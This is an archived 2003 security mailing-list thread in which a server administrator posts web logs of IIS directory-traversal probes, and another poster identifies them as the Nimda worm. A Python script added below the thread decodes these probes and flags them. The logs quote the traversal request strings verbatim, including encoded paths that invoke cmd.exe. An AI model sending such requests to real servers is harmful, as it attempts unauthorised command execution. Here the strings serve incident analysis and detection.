Re: Anyone know this tool?

From: Danny (dannyat_private)
Date: Tue Jul 29 2003 - 10:10:02 PDT

  • Next message: Jason Falciola: "Re: Anyone know this tool?"

    hrm ok, I'm going to crawl back into my hole now :)
    
    I'm kind of confused as to why I haven't seen any of these patterns
    before the last 2 days though. Oh well.
    
    Thanks guys.
    
    On Tuesday, July 29, 2003, at 12:57 PM, Jason Falciola wrote:
    
    > Looks like plain old Nimda to me.  Someone please correct me if I'm
    > missing something obvious.
    >
    > <http://www.cert.org/advisories/CA-2001-26.html>
    >
    > Jason Falciola
    > Security Intelligence Analyst
    > IBM Managed Security Services
    > falciolaat_private
    >
    > Danny <dannyat_private>
    > 07/28/2003 11:24 PM
    >
    >         To:     incidentsat_private
    >         cc:
    >         Subject:        Anyone know this tool?
    >
    > Does anyone happen to know what tool this is? I've seen the exact same
    > scans on 6 of our servers on completely different networks. All the
    > scans have been from different source IPs and all the servers were hit
    > within a space of a few hours.
    >
    > Curiosity is getting the better of me since I've never seen this exact
    > pattern before :)
    >
    > 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >
    > Danny
    > Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
    > Play - http://www.eBoundary.net - Who really sets your electronic
    > boundaries?
    > AIM: eBoundaryTch  | ICQ: 3090141
    >
    Danny
    Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
    Play - http://www.eBoundary.net - Who really sets your electronic  
    boundaries?
    AIM: eBoundaryTch  | ICQ: 3090141
    
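A small log check, added here as an example and not something posted in the thread: it undoes the encodings the quoted requests rely on (the double-encoded `%255c`, the overlong UTF-8 forms such as `%c0%af` and `%c1%1c`, and the malformed `%%35%63`), flags requests that reach `cmd.exe`/`root.exe` or step out of their directory, and groups them by source address so a burst like the one above stands out. The sample lines and the control address `192.0.2.10` are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample in Apache combined-log shape: a subset of the quoted
# probes plus one ordinary request from a second address as a control.
SAMPLE_LOG = """\
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
192.0.2.10 - - [28/Jul/2003:22:19:01 -0500] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
"""
# client, timestamp, method, path and status of a common/combined log line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# overlong UTF-8 forms of '/' and '\' seen in the IIS unicode-traversal requests
OVERLONG = {"%c0%af": "/", "%c0%2f": "/", "%c1%1c": "\\", "%c1%9c": "\\"}
# normalised path that reaches cmd.exe/root.exe or steps out of its directory
SUSPICIOUS = re.compile(r"/(?:root|cmd)\.exe(?:$|\?)|/\.\./")

def normalize(path):
    """Undo the encodings the probes rely on so one rule matches every variant."""
    p = path.lower()
    for enc, ch in OVERLONG.items():
        p = p.replace(enc, ch)
    # two passes: '%255c' -> '%5c' -> '\'; unquote leaves the malformed '%%35%63'
    # as '%5c' after pass one, so it reaches '\' on pass two as well
    for _ in range(2):
        p = unquote(p)
    return p.replace("\\", "/")

def classify(line):
    """Record for a traversal/shell probe, None for a normal request or bad line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, path, status = m.groups()
    norm = normalize(path)
    if not SUSPICIOUS.search(norm):
        return None
    return {"ip": ip, "status": int(status), "raw": path, "normalized": norm}

def summarize(log_text):
    """Group flagged requests by source IP so a burst from one host stands out."""
    hits = {}
    for line in log_text.splitlines():
        rec = classify(line)
        if rec:
            hits.setdefault(rec["ip"], []).append(rec)
    return hits

def any_succeeded(hits):
    # a non-error status means the probed file actually existed on that server
    return any(r["status"] < 400 for recs in hits.values() for r in recs)
```

Every probe in the quoted list came back 400 or 404, which is what `any_succeeded` returning False captures; a 200 on any of these paths is the case that warrants a closer look at that host.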
    



    This archive was generated by hypermail 2b30 : Tue Jul 29 2003 - 13:44:55 PDT